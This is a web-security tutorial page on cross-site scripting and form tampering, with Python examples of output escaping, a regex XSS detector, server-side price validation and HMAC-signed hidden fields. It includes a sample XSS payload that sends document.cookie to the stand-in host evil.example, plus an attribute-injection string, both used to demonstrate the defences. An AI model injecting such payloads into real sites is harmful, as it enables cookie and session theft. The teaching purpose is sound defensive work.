[ Security for Web Developers ] :: 06: Security on Your Site

Users run code (hopefully your code) when they:

  • Load any “active” page (.php, .py, .asp, etc.), meaning any page that runs your server-side code to build its response
  • Fill out forms
  • Search
  • Buy something
  • Create an account
  • Log in to an account

If you wrote the code, you know all too well that you’re letting visitors run it. If the site uses a database, users are touching it too, directly or indirectly, and what goes into that database, and what comes back out of it onto a page, is entirely your responsibility. Consider cross-site scripting, for instance: do you know how to prevent it, and how to detect it when someone tries?
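The two halves of that question, prevention and detection, as an added example that is not code from the original page. The comment strings are constructed sample input, and the render functions stand in for whatever template code echoes stored user text back into a page. Prevention is escaping on output (here with Python’s `html.escape`, in both text and attribute context); detection is a deliberately crude pattern screen over submitted text that is useful for a review queue or an alert, and useless as a substitute for escaping.

```python
import html
import re

# Constructed sample inputs (not from the original page): text a visitor might
# submit through a comment form that your code later echoes into a page.
BENIGN_COMMENT = 'Great post! 5 < 10, and "quotes" work too.'
ATTACK_COMMENT = '<script>new Image().src="http://evil.example/?c="+document.cookie</script>'
ATTACK_ATTRIBUTE = '" onmouseover="alert(1)'


def render_comment_unsafe(comment: str) -> str:
    """Vulnerable: whatever was stored is dropped straight into the HTML."""
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment: str) -> str:
    """Hardened: escape on output, so the browser treats the text as text."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_attribute_safe(value: str) -> str:
    """Attribute context: escape quotes and always quote the attribute value."""
    return f'<input type="text" name="q" value="{html.escape(value, quote=True)}">'


# Detection side: crude patterns for the shapes most XSS payloads take.
# This is a heuristic for logging and alerting; it has false positives and
# misses, and is never a substitute for escaping output.
_XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),          # onload=, onmouseover=, ...
    re.compile(r"javascript\s*:", re.I),
    re.compile(r"<\s*(iframe|object|embed|svg)\b", re.I),
]


def looks_like_xss(text: str) -> bool:
    """True if the submitted text matches any of the payload patterns above."""
    return any(p.search(text) for p in _XSS_PATTERNS)


def screen_submissions(submissions):
    """Return the submissions worth a closer look, for a review queue or alert."""
    return [s for s in submissions if looks_like_xss(s)]


if __name__ == "__main__":
    print(render_comment_unsafe(ATTACK_COMMENT))
    print(render_comment_safe(ATTACK_COMMENT))
    print(render_attribute_safe(ATTACK_ATTRIBUTE))
    print(screen_submissions([BENIGN_COMMENT, ATTACK_COMMENT, ATTACK_ATTRIBUTE]))
```

Note that the escaping happens at output time, not when the comment is stored: the same stored string may later be written into an HTML body, an attribute, a JavaScript string or a URL, and each of those needs its own encoding. Escaping on the way in would either break legitimate text (the `5 < 10` above) or leave one of those contexts uncovered.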

Tamper Data is a simple Firefox extension for (you guessed it) tampering with the data your browser sends to a web server (and vice-versa). It catches each request before it leaves the browser, so anything the page put into a hidden form field, a cookie or a header can be rewritten before your server ever sees it. Here’s an outdated example for the sake of simplicity:

The specific exploit no longer works on most sites, but it’s a good illustration of how and why people tamper with what your site receives: nothing that arrives from the browser, hidden field or not, can be trusted until your own code has checked it.
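What that checking looks like on the server, as an added example that is not code from the original page. The scenario is an assumption chosen to match the kind of tampering described above: a checkout form carries a hidden price field, and an attacker edits it in transit. The catalogue, the form submissions and the secret are all constructed. The hardened handler ignores the client’s price and recomputes the total from the server’s own records; for state that genuinely has to round-trip through the browser, the second half signs the hidden fields with an HMAC so that any edit is detected.

```python
import hashlib
import hmac
import json
from decimal import Decimal

# Constructed catalogue (not from the original page): the server's own record
# of what things cost. This, not the form, is the source of truth for price.
CATALOGUE = {"SKU-100": Decimal("49.99"), "SKU-200": Decimal("9.50")}
MAX_QTY = 10

# Constructed form submissions. In HONEST_POST the hidden "price" field still
# says what the page put there; in TAMPERED_POST it was edited on the way out.
HONEST_POST = {"sku": "SKU-100", "qty": "2", "price": "49.99"}
TAMPERED_POST = {"sku": "SKU-100", "qty": "1", "price": "0.01"}


def checkout_total_unsafe(form: dict) -> Decimal:
    """Vulnerable: trusts the price that came back from the browser."""
    return Decimal(form["price"]) * int(form["qty"])


def checkout_total_safe(form: dict) -> Decimal:
    """Hardened: the client may say what and how many; the server decides the
    price. Every field is validated as if it were hostile, because it may be."""
    sku = form.get("sku", "")
    if sku not in CATALOGUE:
        raise ValueError("unknown sku")
    qty_text = form.get("qty", "")
    if not qty_text.isdigit():
        raise ValueError("qty is not a non-negative integer")
    qty = int(qty_text)
    if not 1 <= qty <= MAX_QTY:
        raise ValueError("qty out of range")
    # The submitted "price" field is ignored entirely.
    return CATALOGUE[sku] * qty


def rejects(form: dict) -> bool:
    """True if the hardened handler refuses the submission."""
    try:
        checkout_total_safe(form)
    except ValueError:
        return True
    return False


# Sometimes state really has to round-trip through the client (a quoted price
# honoured for this session, a multi-step wizard). Then sign it, so edits are
# detected. The secret below is a placeholder assumption: load yours from
# server-side configuration, never from anything the client can see.
SERVER_SECRET = b"replace-with-a-long-random-secret-from-config"


def sign_fields(fields: dict) -> str:
    """Serialise the hidden fields unambiguously and return an HMAC-SHA256 tag."""
    payload = json.dumps(fields, sort_keys=True, separators=(",", ":"))
    return hmac.new(SERVER_SECRET, payload.encode("utf-8"), hashlib.sha256).hexdigest()


def verify_fields(fields: dict, tag: str) -> bool:
    """Recompute the tag and compare in constant time; any edited field fails."""
    return hmac.compare_digest(sign_fields(fields), tag)


if __name__ == "__main__":
    print("unsafe total for tampered post:", checkout_total_unsafe(TAMPERED_POST))
    print("safe total for tampered post:  ", checkout_total_safe(TAMPERED_POST))
    quote = {"sku": "SKU-100", "price": "49.99"}
    tag = sign_fields(quote)
    print("quote verifies:", verify_fields(quote, tag))
    print("edited quote verifies:", verify_fields({**quote, "price": "0.01"}, tag))
```

The signed-field approach protects integrity only: the client can still read the fields, so nothing secret belongs in them, and a valid tag can be replayed unless the signed payload also carries something that ties it to this user and this session (a user id, an expiry). When the server can simply look the value up again, as with the catalogue price, that is always the simpler and safer choice.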

Next: http://schoolforhackers.com/security-web-developers-07-tamper-data/